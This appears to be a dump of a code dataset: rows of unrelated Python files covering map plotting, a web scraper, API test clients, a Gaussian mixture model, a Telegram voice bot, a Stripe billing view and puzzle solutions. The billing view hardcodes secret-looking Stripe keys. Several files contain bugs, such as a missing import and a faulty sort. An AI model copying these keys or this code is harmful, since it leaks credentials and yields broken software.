filling_transform = ccrs.Geodetic()
# Duplicate the 1st element of the coordinates to close the shapes
lat, lon = np.append(lat, lat[0]), np.append(lon, lon[0])
# Add the resulting patch to the list of patches
patches += plt.fill(lon, lat, transform=filling_transform,
fc=face_colors[face_idx],
ec=edge_colors[face_idx],
**kwargs)
patch_collection = PatchCollection(patches)
ax.add_collection(patch_collection)
return ax
def fill_projected_faces_euclidean(x, y, z, **kwargs):
"""Plot a list of faces from euclidean coordinates using a LAEA projection.
The x, y, z euclidean coordinates of the faces are converted to geographic
coordinates before using `fill_projected_faces` to plot them. See this
function's documentation for more information about the function's use.
Parameters
----------
x, y, z, arrays, shape = (n_points, n_vertices)
The 3-dimensional euclidean coordinates of the vertices of the faces
that will be plotted.
**kwargs
Additional key-word arguments passed to `fill_projected_faces`.
Returns
-------
patch_collection: matplotlib PatchCollection
The resulting PatchCollection
Example:
-------
import matplotlib.pyplot as plt
import numpy as np
import angle_visualization
from angle_visualization.triangulation import Delaunay_Sphere
# Generate the sphere faces
n_points = 300
d = Delaunay_Sphere(n_points)
random_colors = [np.random.choice(["r","g","b"]) for _ in d.faces]
# Create a figure and axis with Lambert Azimuthal Equal Area projection
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection=angle_visualization.LAEA)
ax.gridlines()
# Fill the faces of the triangulated sphere
angle_visualization.fill_projected_faces_euclidean(
*d.faces.transpose(2, 0, 1), face_colors = random_colors, alpha=.3
)
"""
# Convert the euclidean coordinates to geographic coordinates
latlon_face_all = np.array(
[cartesian_to_latitude_longitude(xf, yf, zf, deg=True) for (xf, yf, zf) in zip(x, y, z)] # noqa E501
)
# Plot the result using fill_projected_faces
return fill_projected_faces(latlon_face_all[:, 0, :],
latlon_face_all[:, 1, :],
**kwargs)
@grab_current_axis
def plot_projected(lon, lat, ax=None, **kwargs):
"Plot using a crs projection."
projected = LAEA.transform_points(TRANSFORM, lon, lat)
return ax.plot(*projected.T, transform=LAEA, **kwargs)
def plot_projected_euclidean(x, y, z, **kwargs):
"Plot from euclidean coordinates using a crs projection."
lat, lon = cartesian_to_latitude_longitude(x, y, z, deg=True)
return plot_projected(lon, lat, **kwargs)
@grab_current_axis
def scatter_projected(lon, lat, ax=None, **kwargs):
"Scatterplot using a crs projection."
return ax.scatter(lon, lat, transform=TRANSFORM, **kwargs)
def scatter_projected_euclidean(x, y, z, **kwargs):
"Scatterplot from euclidean coordinates using a crs projection."
lat, lon = cartesian_to_latitude_longitude(x, y, z, deg=True)
return scatter_projected(lon, lat, **kwargs)
|
21,949 | e3efba784c7ca23457e9bf613316c57d77816f94 | import turtle
example = turtle.Turtle()
example.color("cyan")
example.speed(100)
turtle.bgcolor("black")
def draw_square(length):
for side_a in range(4):
example.forward(length)
example.right(90)
for side_b in range(4):
example.forward(50)
example.right(90)
example.penup()
example.back(20)
example.pendown()
for square in range(80):
draw_square(5)
example.forward(5)
example.left(5)
example.hideturtle()
turtle.done()
|
21,950 | 4a44603649957ad5a493b7219a43d81f9fa11fb9 | from urllib.parse import urlencode
from requests.exceptions import RequestException
import requests
import json
from bs4 import BeautifulSoup
def get_page_index(offset,keyword):
data = {
'offset': offset,
'format': 'json',
'keyword': keyword,
'autoload': 'true',
'count': '20',
'cur_tab': 3
}
url = 'https://www.toutiao.com/search_content/?' + urlencode(data)
try:
response = requests.get(url)
if response.status_code == 200:
return response.text
return None
except RequestException:
print('请求索引页出错')
return None
def parse_page_index(html):
data = json.loads(html)
if data and 'data' in data.keys():
for item in data.get('data'):
yield item.get('article_url')
def get_page_detail(url):
try:
response = requests.get(url)
if response.status_code == 200:
return response.text
return None
except RequestException:
print('请求详情页出错',url)
return None
def parse_page_detail(html):
soup = BeautifulSoup(html, 'lxml')
title = soup.select('title')[0].get_text()
print(title)
images_pattern = re.compile('var gallery = (.*?);', re.S)
result = re.search(images_pattern, html)
if result:
print(result.group(1))
def main():
html = get_page_index(0,'街拍')
for url in parse_page_index(html):
html = get_page_detail(url)
if html:
parse_page_detail(html)
if __name__ == '__main__':
main() |
21,951 | b974638334ba2fe765ebd965c27c28f22f47cb06 | # -*-coding: utf-8 -*-
#@Time : 2019/12/12 10:37
#@Author : zhongqingqing
#@FileName : bns_api_publicDevice.py
from base.decorators import allure_attach
from bns.public import BusinessApi
class BnsApi(BusinessApi):
def __init__(self, username=None, password=None):
super().__init__(username=username, password=password)
self._config_publicDevice = self.base_yaml_info(
curr_file=__file__,
module_key=__name__.split(".")[-2]
)
@allure_attach("公共服务注册设备")
def bns_publicDevice_add(self, headers=None, deviceType=None, manufacturerType=None, deviceCode=None,
deviceBarCode=None, hardwareVersion=None, lensType=None):
'''
:param self:
:param headers:
:param deviceType:
:param manufacturerType:
:param deviceCode:
:param deviceBarCode:
:param hardwareVersion:
:param lensType:
:return:
'''
api_info = self._config_publicDevice["add"]
http_url = api_info["url"]
http_port = api_info.get("port")
http_method = api_info["method"]
http_contentType = api_info["contentType"]
http_data = api_info["data"]
# 请求入参
data = {
http_data["deviceType"]: deviceType,
http_data["manufacturerType"]: manufacturerType,
http_data["deviceCode"]: deviceCode,
http_data["deviceBarCode"]: deviceBarCode,
http_data["hardwareVersion"]: hardwareVersion,
http_data["lensType"]: lensType,
}
data = self.base_filter_data(data)
# 请求地址
response = self.business_request(
# TODO: 请确认url是否需要变化!!!
request_url="{}{}".format("https://192.168.100.154:8443", http_url),
request_method=http_method,
request_type=http_contentType,
request_data=data,
headers=headers
)
return response
@allure_attach("公共服务设备注册")
def bns_publicDevice_add(self, headers=None, deviceType=None, manufacturerType=None, deviceCode=None,
deviceBarCode=None, hardwareVersion=None, lensType=None):
"""
:param headers:
:param deviceType: 设备类型, 默认: 0
:param manufacturerType: 厂商类型, 默认: 0
:param deviceCode: 设备编码, 默认长度: 14
:param deviceBarCode: 设备条码, 默认长度: 10
:param hardwareVersion: 硬件版本, 默认: V500001001, V500002001, V500003001
:param lensType: 镜头型号, 默认: 6, 8, 12, 16
:return:
"""
api_info = self._config_publicDevice["add"]
http_url = api_info["url"]
http_port = api_info.get("port")
http_method = api_info["method"]
http_contentType = api_info["contentType"]
http_data = api_info["data"]
# 请求入参
data = {
http_data["deviceType"]: deviceType,
http_data["manufacturerType"]: manufacturerType,
http_data["deviceCode"]: deviceCode,
http_data["deviceBarCode"]: deviceBarCode,
http_data["hardwareVersion"]: hardwareVersion,
http_data["lensType"]: lensType,
}
data = self.base_filter_data(data)
# 请求地址
response = self.business_request(
# 注册设备采用购物中心的iot平台
request_url="{}{}".format("https://192.168.100.154:8443", http_url),
request_method=http_method,
request_type=http_contentType,
request_data=data,
headers=headers
)
return response
@allure_attach("公共服务设备列表")
def bns_publicDevice_list(self, headers=None, deviceBarCode=None, deviceCode=None, deviceType=None,
deviceTypeName=None, startTime=None, endTime=None, hardwareVersion=None,
isEnable=None, lensType=None, manufacturerType=None, manufacturerTypeName=None,
pageNo=None, pageSize=None):
'''
:param headers:
:param deviceBarCode: 设备条码
:param deviceCode: 设备编码
:param deviceType: 设备类型
:param deviceTypeName: 设备类型名称
:param startTime: 查询开始时间
:param endTime: 查询结束时间
:param hardwareVersion: 硬件版本号
:param isEnable: 是否被启用
:param lensType: 镜头型号
:param manufacturerType: 厂商
:param manufacturerTypeName: 厂商名称
:param pageNo: 页码值
:param pageSize: 每页条数
:return:
'''
api_info = self._config_publicDevice["list"]
http_url = api_info["url"]
http_port = api_info.get("port")
http_method = api_info["method"]
http_contentType = api_info["contentType"]
http_data = api_info["data"]
# 请求入参
data = {
http_data["deviceBarCode"]: deviceBarCode,
http_data["deviceCode"]: deviceCode,
http_data["deviceType"]: deviceType,
http_data["deviceTypeName"]: deviceTypeName,
http_data["startTime"]: startTime,
http_data["endTime"]: endTime,
http_data["hardwareVersion"]: hardwareVersion,
http_data["isEnable"]: isEnable,
http_data["lensType"]: lensType,
http_data["manufacturerType"]: manufacturerType,
http_data["manufacturerTypeName"]: manufacturerTypeName,
http_data["pageNo"]: pageNo,
http_data["pageSize"]: pageSize,
}
data = self.base_filter_data(data)
# 请求地址
response = self.business_request(
request_url="{}{}".format("https://192.168.100.154:8443", http_url),
request_method=http_method,
request_type=http_contentType,
request_data=data,
headers=headers
)
return response
@allure_attach("公共服务设备删除")
def bns_publicDevice_delete(self, headers=None, deviceCode=None):
'''
:param headers:
:param deviceCode: 设备编码
:return:
'''
api_info = self._config_publicDevice["delete"]
http_url = api_info["url"]
http_port = api_info.get("port")
http_method = api_info["method"]
http_contentType = api_info["contentType"]
http_data = api_info["data"]
# 请求入参
data = {
http_data["deviceCode"]: deviceCode,
}
data = self.base_filter_data(data)
# 请求地址
response = self.business_request(
request_url="{}{}".format("https://192.168.100.154:8443", http_url),
request_method=http_method,
request_type=http_contentType,
request_data=data,
headers=headers
)
return response
if __name__ == '__main__':
api = BnsApi()
res = api.bns_publicDevice_delete("VzB0GGPjLgGgcj")
print(res) |
21,952 | c04ba5240766f2525866e56581ad2d599086da8b | def main():
num_ans = int(input())
card_list = list(map(int, input().split()))
card_list.sort()
card_list.reverse()
print(sum(card_list) - sum(card_list[1::2]) * 2)
if __name__ == '__main__':
main()
|
21,953 | 7ce67174ce810e01eadd546aa6f0b78611708f1f | from logging import Logger
from typing import Optional
from api.models import UserModel
from api.schemas import user_schemas
from sqlalchemy.orm import Session
class UserRepository:
def __init__(self, logger: Logger) -> None:
self._logger = self._logger = logger.getChild(self.__class__.__name__)
def create(self, db: Session, user: UserModel) -> Optional[UserModel]:
try:
self._logger.debug(f"create a new user for user {user.username}.")
db.add(user)
db.commit()
db.refresh(user)
return user
except:
self._logger.exception("create user fail.")
raise
def get_user(self, db: Session, username: str) -> user_schemas.UserInDB:
return db.query(UserModel).filter(UserModel.username == username).first()
|
21,954 | 7391cb242a740e98e97976727c176b4cfee8c2db | import numpy as np
import matplotlib.pyplot as plt
class GaussianMixture:
def __init__(self,k=3,max_iter=50):
self.k=k
self.max_iter=max_iter
self.labels_=None
self.C=None
self.alpha=None
self.mu=None
self.cov=None
self.gamma=None
pass
# p210 图9.6 高斯混合聚类算法
def fit(self,X):
# p210初始化方法
self.alpha=np.zeros((self.k,))
for i in range(self.k):
self.alpha[i]=1./self.k
mu_indices=[5,21,26]
self.mu=X[mu_indices]
self.cov=np.array([[[0.1,0.],[0.0,0.1]],[[0.1,0.],[0.,0.1]],[[0.1,0.],[0.,0.1]]])
self.gamma=np.zeros((X.shape[0],self.k))
for _ in range(self.max_iter):
for j in range(X.shape[0]):
alpha_p=np.zeros((self.k,))
sum=0.
for i in range(self.k):
alpha_p[i]=self.alpha[i]*self._p(X[j],self.mu[i],self.cov[i])
sum+=alpha_p[i]
self.gamma[j,:]=alpha_p/sum
for i in range(self.k):
sum_gamma_i=np.sum(self.gamma[:,i])
self.mu[i]=X.T.dot(self.gamma[:,i])/sum_gamma_i
numerator=0.
for j in range(X.shape[0]):
numerator+=(self.gamma[j,i]*((X[j]-self.mu[i]).reshape(-1,1).dot((X[j]-self.mu[i]).reshape(1,-1))))
self.cov[i]=numerator/sum_gamma_i
self.alpha[i]=sum_gamma_i/X.shape[0]
self.labels_=np.argmax(self.gamma,axis=1)
self.C={}
for i in range(self.k):
self.C[i]=[]
for j in range(len(self.labels_)):
self.C[self.labels_[j]].append(j)
def predict(self,X):
gamma = np.zeros((X.shape[0], self.k))
for j in range(X.shape[0]):
alpha_p = np.zeros((self.k,))
sum = 0.
for i in range(self.k):
alpha_p[i] = self.alpha[i] * self._p(X[j], self.mu[i], self.cov[i])
sum += alpha_p[i]
gamma[j, :] = alpha_p / sum
return np.argmax(gamma,axis=1)
# 公式 9.28
@classmethod
def _p(cls,x,mu,cov):
exp_coef=-0.5*((x-mu).T.dot(np.linalg.inv(cov)).dot(x-mu))
p=np.exp(exp_coef)/(np.power(2*np.pi,mu.shape[0]/2)*np.sqrt(np.linalg.det(cov)))
return p
if __name__=='__main__':
X=np.array([[0.697,0.460],[0.774,0.376],[0.634,0.264],[0.608,0.318],[0.556,0.215],
[0.403,0.237],[0.481,0.149],[0.437,0.211],[0.666,0.091],[0.243,0.267],
[0.245,0.057],[0.343,0.099],[0.639,0.161],[0.657,0.198],[0.360,0.370],
[0.593,0.042],[0.719,0.103],[0.359,0.188],[0.339,0.241],[0.282,0.257],
[0.748,0.232],[0.714,0.346],[0.483,0.312],[0.478,0.437],[0.525,0.369],
[0.751,0.489],[0.532,0.472],[0.473,0.376],[0.725,0.445],[0.446,0.459]])
X_test=X
gmm=GaussianMixture(k=3,max_iter=50)
gmm.fit(X)
print(gmm.C)
print(gmm.labels_)
print(gmm.predict(X_test))
plt.scatter(X[:, 0], X[:, 1], c=gmm.labels_)
plt.scatter(gmm.mu[:, 0], gmm.mu[:, 1],c=range(gmm.k), marker='+')
plt.title('tinyml')
plt.show()
from sklearn.mixture import GaussianMixture
sklearn_gmm = GaussianMixture(n_components=3, covariance_type='full',
max_iter=50).fit(X)
labels=sklearn_gmm.predict(X)
print(labels)
plt.scatter(X[:,0],X[:,1],c=labels)
plt.title('sklearn')
plt.show()
|
21,955 | b102f34f6c40aded51011c308fbeed83e9ce11ee | ML_APP_DARK_BLUE = '#282774'
|
21,956 | 3520812eff1d5aea0ca4490fabbb03cef79d8cea | from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import speech_recognition as sr
from pydub import AudioSegment
import pydub
from gtts import gTTS
#default commands handlers
def start(update,context):
"""Send a message when the command /start is issued."""
update.message.reply_text('welcome to voice bot')
def help_command(update,context):
"""Send a message when the command /help is issued."""
update.message.reply_text('I am a Voice bot')
#custom commands handler and outputs
def echo(update,context): ## text output handler
msg=update.message.text
update.message.reply_text(msg)
# converting speech to text
#initial_voice os the audio file user sent to bot
def speech_to_text(initial_voice):
r = sr.Recognizer()
#download the file in .oga format
initial_voice.download("hello.oga")
#To convert audio into text we use google speech recognition and it doesn't support .oga format.
#so to convert .oga audio to wav we use pydub
# pydub needs ffmpeg software to convert the audio transcripts.
#MAKE SURE YOU HAVE ffmpeg.exe FILE IN YOUR WORKING DIRECTORY
pydub.AudioSegment.ffmpeg = "path to ffmpeg.exe file/ffmpeg"
#use AudioSegment method to convert .oga audio transcripts to .wav transcripts
AudioSegment.from_file("hello.oga").export("input_audio2.wav", format="wav")
#configure the generated wav file as source for the recognizer
with sr.WavFile("input_audio2.wav") as source:
#record the audio data from source to audio_data variable
audio_data = r.record(source)
try:
# recognize (convert from speech to text)
text = r.recognize_google(audio_data,language='en-IN')
return text
#any errors in recognizing the text from audio will be handled here
except:
return "Sorry...the audio file is not clear enough to extract the text"
def text_to_speech(text):
myobj = gTTS(text=text,lang='en')
myobj.save("output_audio1.mp3")
AudioSegment.from_file("output_audio1.mp3").export("output_audio2.ogg", format="ogg")
print('saved')
return
#triggers when the bot receives audio file, NOTE THAT THE AUDIO FORMAT SUPPORTED BY TELEGRAM IS oga.
#so,you get your audio file in ogg format
def voice_handler(update,context):
#in the entire set of message the bot is receiving,audio file can be accessed by update.message.voice.file_id
file = context.bot.getFile(update.message.voice.file_id)
#Now we need to convert the audio into text.
#calling speech_to_text function and passing the audio file as parameter
resp=speech_to_text(file)
#sending back the text form of audio to the user
update.message.reply_text(resp)
#main handler, heart of the bot where you filter the voice message and handle them
# refer https://python-telegram-bot.readthedocs.io/en/stable/telegram.ext.html for documentation
def main():
try:
##configure the updater with your bot token
updater = Updater("your bot token here", use_context=True)
##configure a dispatcher (responsible for receiving messages from bot )
dp = updater.dispatcher
"""
telegram bots have a default command '/start',
when you try to make a conversation with the bot for the first time, you can use the /start command
You can add your custom commands using add_handler method.
CommandHandler is responsible for handling the command type messages, they usually look like /start,/help,etc
"""
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("help", help_command))
"""
Just like command handler, we have MessageHandler which takes care of all the incoming messages other than commands
we can filter out the various messages using Filters.text or Filters.audio
where Filters.text will handle all the plain text messages sent to the bot
Filters.audio will handle all the audio files sent to the bot
"""
#text message handler
dp.add_handler(MessageHandler(Filters.text,echo))
#voice message handler
dp.add_handler(MessageHandler(Filters.voice, voice_handler))
# Start getting updates from the bot
updater.start_polling()
updater.idle()
# exception handling can be used in this manner as deploying this bot will give you many webhook errors,etc if not configured properly
# handle them carefully, if not this may lead to program crash in production.
except:
# in case of any errors, i am calling the main function to reset the program execution.
main()
#call the main function
print("bot started on sever")
main()
|
21,957 | e716df5964411ebde921cda8b05e03ebd3b805eb | # Flake8 Plugin for Python-Builder
#
# Copyright 2012 The Python Builder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Plugin for Tarek Ziade's flake8 script.
Flake8 is a wrapper around: PyFlakes, pep8, Ned's McCabe script.
https://bitbucket.org/tarek/flake8
"""
__author__ = 'Michael Gruber'
from pythonbuilder.core import after, task, use_plugin
from pythonbuilder.utils import assert_can_execute, read_file
from pythonbuilder.plugins.python.python_plugin_helper import execute_tool_on_source_files
use_plugin("python.core")
@after("prepare")
def assert_flake8_is_executable (logger):
"""
Asserts that the flake8 script is executable.
"""
logger.debug("Checking if flake8 is executable.")
assert_can_execute(command_and_arguments=("flake8",),
prerequisite="flake8",
caller="plugin python.flake8")
@task
def analyze (project, logger):
"""
Applies the flake8 script to the sources of the given project.
"""
logger.info("Applying flake8 to project sources.")
execution_result = execute_tool_on_source_files(project=project,
name="flake8",
command_and_arguments=["flake8"])
report_file = execution_result[1]
report_lines = read_file(report_file)
count_of_warnings = len(report_lines)
if count_of_warnings > 0:
logger.warn("flake8 found %d warning(s).", count_of_warnings)
|
21,958 | 327a0911e3990255668c59268bcdd88f9f69fa43 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-27 11:55
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ArticleModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50, verbose_name='title')),
('head_img', models.CharField(max_length=150, verbose_name='hand image')),
('quote_title', models.CharField(blank=True, max_length=100, null=True, verbose_name='quote title')),
('quote', models.TextField(verbose_name='quote')),
('quote_cite', models.CharField(blank=True, max_length=40, null=True, verbose_name='quote_cite')),
('quote_footer', models.CharField(blank=True, max_length=100, null=True, verbose_name='quote_footer')),
('article_md', models.TextField(verbose_name='markdown article text')),
('article_html', models.TextField(default='', verbose_name='html article text')),
('is_valid', models.BooleanField(default=True, verbose_name='if is valid')),
('create_time', models.DateTimeField(verbose_name='create time')),
('modify_time', models.DateTimeField(auto_now=True, verbose_name='modify time')),
('pinyin_title', models.CharField(default='', max_length=100, verbose_name='initial pinyin title')),
],
options={
'db_table': 'article',
},
),
migrations.CreateModel(
name='Classify',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='classification name')),
],
options={
'db_table': 'classify',
},
),
migrations.CreateModel(
name='TagModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag', models.CharField(max_length=20, verbose_name='article tag')),
],
options={
'db_table': 'tag',
},
),
migrations.AddField(
model_name='articlemodel',
name='classify',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='article', to='blog.Classify'),
),
migrations.AddField(
model_name='articlemodel',
name='tag',
field=models.ManyToManyField(related_name='article', to='blog.TagModel'),
),
]
|
21,959 | 5669865b6f746616c7f63427902f990c9fe3fa59 | #!/usr/bin/env python
__author__ = "Thomas Kargul"
def revenge():
numOfInput = int(raw_input()) # 1 <= T <= 100
inputS = [] #list of strings
for i in range(numOfInput):
inp = raw_input()
inputS.append(inp)
#flipping = reversing a string, and "inverse"
def flip(pancakes):
pancakes.reverse()
for i, p in enumerate(pancakes):
pancakes[i] = "+" if p == "-" else "-"
#flipCount += 1
return pancakes
#find how many + are at the end of the string,
#since they are already +, don't flip these
#flip goes from [0]->index before first + in the last consecutive group of +
def findBackCount(S):
backCount = len(S)
for i, sign in reversed(list(enumerate(S))):
if sign == "+":
backCount = i
else:
break
return backCount #index of first rear set of +
#find the number of + in beginning, these will be flipped to -
#before the bigger flip, so after they bigger flip they will
#be on bottom and be + again
def findFrontPlus(S):
frontPlus = 0
if S[0] == "+":
for sign in S:
if sign == "+": frontPlus += 1
else: break
return frontPlus
#if no -, then all pancakes are flipped to + aka happy side
def allHappy(S):
for sign in S:
if sign == "-": return False
return True
for case, strS in enumerate(inputS):
S = list(strS)
flipCount = 0 #reset for each S in inputs
while not allHappy(S):
backCount = findBackCount(S)
frontPlus = findFrontPlus(S)
if frontPlus > 0:
#flip front +'s to -'s before the bigger flip
frontS = S[0:frontPlus:]
backS = S[frontPlus::]
frontS_flipped = flip(frontS)
flipCount += 1
S = frontS_flipped + backS
#bigger flip
if backCount < len(S):
frontS = S[0:backCount:]
backS = S[backCount::]
frontS_flipped = flip(frontS)
flipCount += 1
S = frontS_flipped + backS
else:
#there are no + at the back
S = flip(S)
flipCount += 1
print("Case #{}: {}".format(case+1, flipCount))
#go as far down the stack until EOS or only "+"s left
#if + on top*** and - on bottom, flip top first so that it becomes -
#and thus becomes a + when the stack is flipped
#i.e +++-- > -++-- > ++--+
#*** or flip entire consecutive +'s on top so they become -'s before flip, then +'s again after flip
#find pancakes to be flipped then
#send S[0:end_of_flip: ] to flip()
#return of flip().append( S[end_of_flip:len(S): ] )
if __name__ == '__main__':
revenge() |
21,960 | cf60524d11fd5a76257bd8979a51c0263644fa5e | #!/usr/bin/env python3
"""1000-digit Fibonacci number"""
from math import log10
from fibonacci import FibonacciSeries
MAX_DIGITS = 1000
def main():
"""
Iterate through Fibonacci numbers and print the term number of the first
one to exceed MAX_DIGITS in length.
"""
for term in FibonacciSeries():
if log10(term.value) + 1 >= MAX_DIGITS:
print((term.index))
break
if __name__ == '__main__':
main()
|
21,961 | eaf05e9e69df0cc59dddeda2e569bb71b568e4b5 | from django.conf import settings
from django.db import models
from userroles import roles
class UserRole(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='role')
name = models.CharField(max_length=100, choices=roles.choices)
child = models.CharField(max_length=100, blank=True)
_valid_roles = roles
@property
def profile(self):
if not self.child:
return None
return getattr(self, self.child)
def __eq__(self, other):
return self.name == other.name
def __getattr__(self, name):
if name.startswith('is_'):
role = getattr(self._valid_roles, name[3:], None)
if role:
return self == role or self.subrole_of( role )
role = roles.get(self.name)
if hasattr(role, name):
return getattr(role, name)
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, name))
def __unicode__(self):
return self.name
def set_user_role(user, role):
role_name = role if isinstance(role, basestring) else role.name
try:
profile = UserRole.objects.get(user=user)
except UserRole.DoesNotExist:
profile = UserRole(user=user, name=role_name)
else:
profile.name = role_name
profile.save()
|
21,962 | 34443451d5ac643cef9816d6bc78f42ab0047608 | from django.conf import settings
from django.shortcuts import render , redirect
from django.http import JsonResponse, HttpResponse
from django.utils.http import is_safe_url
import stripe
from .models import BillingProfile, Card
STRIP_SECRET_KEY = getattr(settings, "STRIP_SECRET_KEY",'sk_test_dcQwZSOCpgPbOkLHaStIMRIs')
STRIPE_PUB_KEY= getattr(settings, "STRIPE_PUB_KEY",'pk_test_dIXXyNLLFIHbCRidgDWEiSOL')
stripe.api_key = STRIP_SECRET_KEY
def payment_method_view(request):
#next_url
# if request.user.is_authenticated:
# billing_profile = request.user.billingprofile
# my_customer_id = billing_profile.customer_id
billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
if not billing_profile:
return redirect('/cart/')
next_url = None
next_ = request.GET.get('next')
if is_safe_url(next_, request.get_host()):
next_url = next_
return render(request, 'billing/payment-method.html',{"publish_key":STRIPE_PUB_KEY, 'next_url':next_url})
def payment_method_createview(request):
if request.method=="POST" and request.is_ajax():
billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
if not billing_profile:
return HttpResponse({"message":"Cannot find this user"},status_code=401)
# if we didn't know what the data comming from the POST so just print(request.POST)
token = request.POST.get("token")
# token is coming from the POST , need to check
if token is not None:
new_card_obj = Card.objects.add_new(billing_profile, token)
# to see how to store our card in our database too
return JsonResponse({"message":"Success , your card is added!"})
return HttpResponse("error",status_code=401)
|
21,963 | 7c06241ff2a6a89c68e8a8a271c0b5139dddb8bd | # Variables
# Basics types
# Operation on numbers
# Operation on string
# Numbers and String
number1 = 10
number2 = 7
string1 = "hello"
# + - / * % ** //
print(number1 + number2)
print(number1 - number2)
print(number1 * number2)
print(number1 / number2)
print(number1 % number2)
print(number1 ** number2)
print(number1 // number2)
|
21,964 | 4c02aaac96a4e5049e51f3a9afe8076a23f8d900 | #Inicio
print('Bienvenido a mi programa')
inicio=input('Pulsa 1 para contar palabras, Pulsa 2 para comprobar palindromos, Pulsa 3 para deletrear|')
#Contador de palabras
if inicio == ('1'):
Texto1 = input('Introduce el texto:')
Contador=(len (Texto1))
print('Este texto tiene', Contador,'caracteres')
#palindromos
if inicio == ('2'):
Cadena1 = input('Introduce la palabra:')
Cadena2 = Cadena1[::-1]
print(Cadena1, 'al revés es', Cadena2)
if Cadena1==Cadena2:
print('Por lo tanto', Cadena1,'es un palindromo')
else:
print('Por lo tanto', Cadena1, 'no es un palindromo')
#Deletrear
if inicio==('3'):
Deletrear=input('Escribe tu palabra:')
palabra=Deletrear
for (palabra) in (Deletrear):
print(palabra)
|
21,965 | 5bb7edf3141273d60ebb49c31e646be864736f5f | import math
def is_prime(num, primes):
root = int(math.sqrt(num))
if num == 0 or num == 1:
return False
if num == 2:
return True
if num in primes:
return True
for i in primes:
if i > root:
return True
elif num%i == 0:
return False
# for problem 7 - finds the nth prime number
def find_number_prime(n):
primes = [2]
i = 1
while len(primes) < n:
if is_prime(i, primes):
primes.append(i)
i += 2
return primes[-1]
print(find_number_prime(10001))
# for problem 10
def find_prime_sum(maxNum):
primes = [2]
i = 1
while (primes[-1] < maxNum):
if is_prime(i, primes):
primes.append(i)
i += 2
print (primes[-1])
sum = 0
for prime in primes:
sum += prime
return sum - prime[-1]
print ("##########")
print (find_prime_sum(2000000))
|
21,966 | e39374232646782ec4ddfe837848cb5eb259b9fe | '''
信号测量的结果包括测量编号和测量值。存在信号测量结果丢弃及测量结果重复的情况。
1.测量编号不连续的情况,认为是测量结果丢弃。对应测量结果丢弃的情况,需要进行插值操作以更准确的评估信号。
采用简化的一阶插值方法,由丢失的测量结果两头的测量值算出两者中间的丢失值。
假设第M个测量结果的测量值为A,第N个测量结果的测量值为B。则需要进行(N-M-1)个测量结果的插值处理。
进行一阶线性插值估计的第N+i个测量结果的测量值为A+( (B-A)/(N-M) )*i (注:N的编号比M大。)
例如:只有测量编号为4的测量结果和测量编号为7的测量结果,测量值分别为4和10
则需要补充测量编号为5和6的测量结果。
其中测量编号为5的测量值=4 + ((10-4)/(7-4))*1 = 6
其中测量编号为6的测量值=4 + ((10-4)/(7-4))*2 = 8
2.测量编号相同,则认为测量结果重复,需要对丢弃后来出现的测量结果。
请根据以上规则进行测量结果的整理。
输入描述:
输入说明
1 输入两个整数m, n
2 输入m个数据组
输出描述:
输出整理后的结果
'''
def bubbleSort(list_r):
for j in range(1,len(list_r)-1):
for i in range(len(list_r)-1):
if list_r[i]>list_r+1:
list_r[i],list_r[i+1]=list_r[i+1],list_r[i]
'''
def signalOP():
group=input()
groupList=list(map(int,group.split()))
M=groupList[0]
N=groupList[1]
if N<=M:
print("信号错误")
# signalDict={}
signalList=[]
# count=0
for i in range(M):
# if count>M:
# break
# else:
signalIn = input()
# listG=list(map(int,signalIn.split()))
order,ord_value=[int(j) for j in signalIn.split()]
# if listG[0] not in signalDict:
if len(signalList)>0:
if signalList[-1][0]==order:
count += 1
# signalDict[listG[0]]=listG[1]
signalList.append((listG[0],listG[1]))
else:
continue
differene=N-M-1
for j in range(differene):
i=j+1
order=N+i
valueM_A=signalDict[signalList[M-1]]
valueN_B=signalDict[signalList[N-1]]
ord_value=valueM_A+( (valueN_B-valueM_A)/(N-M) )*i
signalDict[order]=ord_value
signalList.append(order)
bubbleSort(signalList)
for i in signalList:
print("%s %s"%(i,signalDict[i]))
'''
import math
def insertNum(M, N, signalList):
last_order,last_ordValue=signalList[-1][0],signalList[-1][1]
step=math.trunc((N-last_ordValue)/(M-last_order))
for j in range(1,M-last_order):
signalList.append([last_order+j,last_ordValue+step*j])
def signalOP():
group = input()
groupList = list(map(int, group.split()))
M = groupList[0]
N = groupList[1]
if N <= M:
print("信号错误")
signalList = []
for i in range(M):
signalIn = input()
order, ord_value = [int(j) for j in signalIn.split()]
if len(signalList) > 0:
if signalList[-1][0] == order:
continue
elif signalList[-1][0]+1<order:
insertNum(order,ord_value,signalList)
signalList.append([order,ord_value])
else:
signalList.append([order,ord_value])
else:
signalList.append([order,ord_value])
for i in signalList:
print("%s %s" % (i[0], i[1]))
while True:
try:
signalOP()
except:
break
|
21,967 | cf110319aed349d72f3cda7b2621e2167118ddd1 | person = {
'first_name': 'zoctopus',
'last_name': 'zhang',
'age': 21,
'city': 'chengdu',
}
print(person['first_name'])
print(person['last_name'])
print(person['age'])
print(person['city']) |
21,968 | 3f3caa173b999a0f0cc53f4ec36b22b1a9ccce46 | from geopy.geocoders import Nominatim
def get_location(latitude, longitude):
coordinates = latitude + ", " + longitude
locator = Nominatim(user_agent="tynrGeocoder")
location = locator.reverse(coordinates)
# Nominatim returns None when unable to reverse geocode.
